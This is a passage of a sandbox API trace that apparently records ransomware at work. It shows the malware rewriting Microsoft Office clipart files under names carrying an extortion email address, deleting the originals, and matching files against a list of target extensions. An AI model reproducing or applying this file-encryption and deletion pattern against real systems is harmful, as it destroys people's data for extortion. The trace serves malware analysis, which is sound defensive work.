liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.069] GetLastError () returned 0x0 [0200.069] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1c0c, lpOverlapped=0x0) returned 1 [0200.118] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1c10, lpOverlapped=0x0) returned 1 [0200.119] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.119] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.119] SetEndOfFile (hFile=0x340) returned 1 [0200.119] CloseHandle (hObject=0x340) returned 1 [0200.120] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.120] SetEndOfFile (hFile=0x37c) returned 1 [0200.120] CloseHandle (hObject=0x37c) returned 1 [0200.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf")) returned 1 [0200.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.121] lstrlenW (lpString=".doc") returned 4 [0200.121] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.121] lstrlenW (lpString=".docx") returned 5 [0200.121] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.121] lstrlenW (lpString=".pdf") returned 4 [0200.121] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.121] lstrlenW (lpString=".xls") returned 4 [0200.121] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.121] lstrlenW (lpString=".xlsx") returned 5 [0200.121] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.121] lstrlenW (lpString=".ppt") returned 4 [0200.121] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.122] lstrlenW (lpString=".zip") returned 4 [0200.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.122] lstrlenW (lpString=".rar") returned 4 [0200.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.122] lstrlenW (lpString=".bz2") returned 4 [0200.122] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.122] lstrlenW (lpString=".7z") returned 3 [0200.122] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.122] lstrlenW (lpString=".dbf") returned 4 [0200.122] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.122] lstrlenW (lpString=".1cd") returned 4 [0200.122] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF") returned 68 [0200.122] lstrlenW (lpString=".jpg") returned 4 [0200.122] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.122] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.122] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.123] GetLastError () returned 0x0 [0200.123] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1f7c, lpOverlapped=0x0) returned 1 [0200.200] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1f80, lpOverlapped=0x0) returned 1 [0200.293] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.294] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.294] SetEndOfFile (hFile=0x340) returned 1 [0200.294] CloseHandle (hObject=0x340) returned 1 [0200.294] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.294] SetEndOfFile (hFile=0x37c) returned 1 [0200.295] CloseHandle (hObject=0x37c) returned 1 [0200.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf")) returned 1 [0200.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.296] lstrlenW (lpString=".doc") returned 4 [0200.296] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.296] lstrlenW (lpString=".docx") returned 5 [0200.296] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.296] lstrlenW (lpString=".pdf") returned 4 [0200.296] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.296] lstrlenW (lpString=".xls") returned 4 [0200.296] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.296] lstrlenW (lpString=".xlsx") returned 5 [0200.296] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.296] lstrlenW (lpString=".ppt") returned 4 [0200.296] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.296] lstrlenW (lpString=".zip") returned 4 [0200.297] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.297] lstrlenW (lpString=".rar") returned 4 [0200.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.297] lstrlenW (lpString=".bz2") returned 4 [0200.297] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.297] lstrlenW (lpString=".7z") returned 3 [0200.297] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.297] lstrlenW (lpString=".dbf") returned 4 [0200.297] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.297] lstrlenW (lpString=".1cd") returned 4 [0200.297] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF") returned 68 [0200.297] lstrlenW (lpString=".jpg") returned 4 [0200.297] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.297] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.297] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.298] GetLastError () returned 0x0 [0200.298] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x4f08, lpOverlapped=0x0) returned 1 [0200.303] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4f10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4f10, lpOverlapped=0x0) returned 1 [0200.304] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.304] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.304] SetEndOfFile (hFile=0x340) returned 1 [0200.305] CloseHandle (hObject=0x340) returned 1 [0200.305] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.305] SetEndOfFile (hFile=0x37c) returned 1 [0200.306] CloseHandle (hObject=0x37c) returned 1 [0200.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.306] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf")) returned 1 [0200.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.307] lstrlenW (lpString=".doc") returned 4 [0200.307] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.307] lstrlenW (lpString=".docx") returned 5 [0200.307] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0200.307] lstrlenW (lpString=".pdf") returned 4 [0200.307] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.307] lstrlenW (lpString=".xls") returned 4 [0200.307] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.307] lstrlenW (lpString=".xlsx") returned 5 [0200.307] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0200.307] lstrlenW (lpString=".ppt") returned 4 [0200.307] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.307] lstrlenW (lpString=".zip") returned 4 [0200.307] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.307] lstrlenW (lpString=".rar") returned 4 [0200.307] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.307] lstrlenW (lpString=".bz2") returned 4 [0200.307] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.308] lstrlenW (lpString=".7z") returned 3 [0200.308] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.308] lstrlenW (lpString=".dbf") returned 4 [0200.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.308] lstrlenW (lpString=".1cd") returned 4 [0200.308] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF") returned 68 [0200.308] lstrlenW (lpString=".jpg") returned 4 [0200.308] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.308] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.308] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.309] GetLastError () returned 0x0 [0200.309] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x5398, lpOverlapped=0x0) returned 1 [0200.370] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x53a0, lpOverlapped=0x0) returned 1 [0200.371] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.371] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.371] SetEndOfFile (hFile=0x340) returned 1 [0200.372] CloseHandle (hObject=0x340) returned 1 [0200.372] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.372] SetEndOfFile (hFile=0x37c) returned 1 [0200.373] CloseHandle (hObject=0x37c) returned 1 [0200.373] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf")) returned 1 [0200.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.374] lstrlenW (lpString=".doc") returned 4 [0200.374] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString=".docx") returned 5 [0200.374] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.374] lstrlenW (lpString=".pdf") returned 4 [0200.374] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString=".xls") returned 4 [0200.374] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.374] lstrlenW (lpString=".xlsx") returned 5 [0200.374] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.374] lstrlenW (lpString=".ppt") returned 4 [0200.374] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.374] lstrlenW (lpString=".zip") returned 4 [0200.374] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.374] lstrlenW (lpString=".rar") returned 4 [0200.374] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString=".bz2") returned 4 [0200.374] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString=".7z") returned 3 [0200.374] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.374] lstrlenW (lpString=".dbf") returned 4 [0200.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.375] lstrlenW (lpString=".1cd") returned 4 [0200.375] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 68 [0200.375] lstrlenW (lpString=".jpg") returned 4 [0200.375] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.375] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.375] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.376] GetLastError () returned 0x0 [0200.376] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x180e, lpOverlapped=0x0) returned 1 [0200.427] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1810, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1810, lpOverlapped=0x0) returned 1 [0200.428] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.429] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.429] SetEndOfFile (hFile=0x340) returned 1 [0200.429] CloseHandle (hObject=0x340) returned 1 [0200.429] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.429] SetEndOfFile (hFile=0x37c) returned 1 [0200.430] CloseHandle (hObject=0x37c) returned 1 [0200.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.430] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf")) returned 1 [0200.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.431] lstrlenW (lpString=".doc") returned 4 [0200.431] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.431] lstrlenW (lpString=".docx") returned 5 [0200.431] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.431] lstrlenW (lpString=".pdf") returned 4 [0200.431] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString=".xls") returned 4 [0200.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.432] lstrlenW (lpString=".xlsx") returned 5 [0200.432] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.432] lstrlenW (lpString=".ppt") returned 4 [0200.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.432] lstrlenW (lpString=".zip") returned 4 [0200.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.432] lstrlenW (lpString=".rar") returned 4 [0200.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString=".bz2") returned 4 [0200.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString=".7z") returned 3 [0200.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.432] lstrlenW (lpString=".dbf") returned 4 [0200.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.432] lstrlenW (lpString=".1cd") returned 4 [0200.432] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 68 [0200.432] lstrlenW (lpString=".jpg") returned 4 [0200.432] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.435] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.435] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.436] GetLastError () returned 0x0 [0200.436] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1d4a, lpOverlapped=0x0) returned 1 [0200.550] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1d50, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1d50, lpOverlapped=0x0) returned 1 [0200.551] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.551] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.551] SetEndOfFile (hFile=0x340) returned 1 [0200.551] CloseHandle (hObject=0x340) returned 1 [0200.551] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.551] SetEndOfFile (hFile=0x37c) returned 1 [0200.552] CloseHandle (hObject=0x37c) returned 1 [0200.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 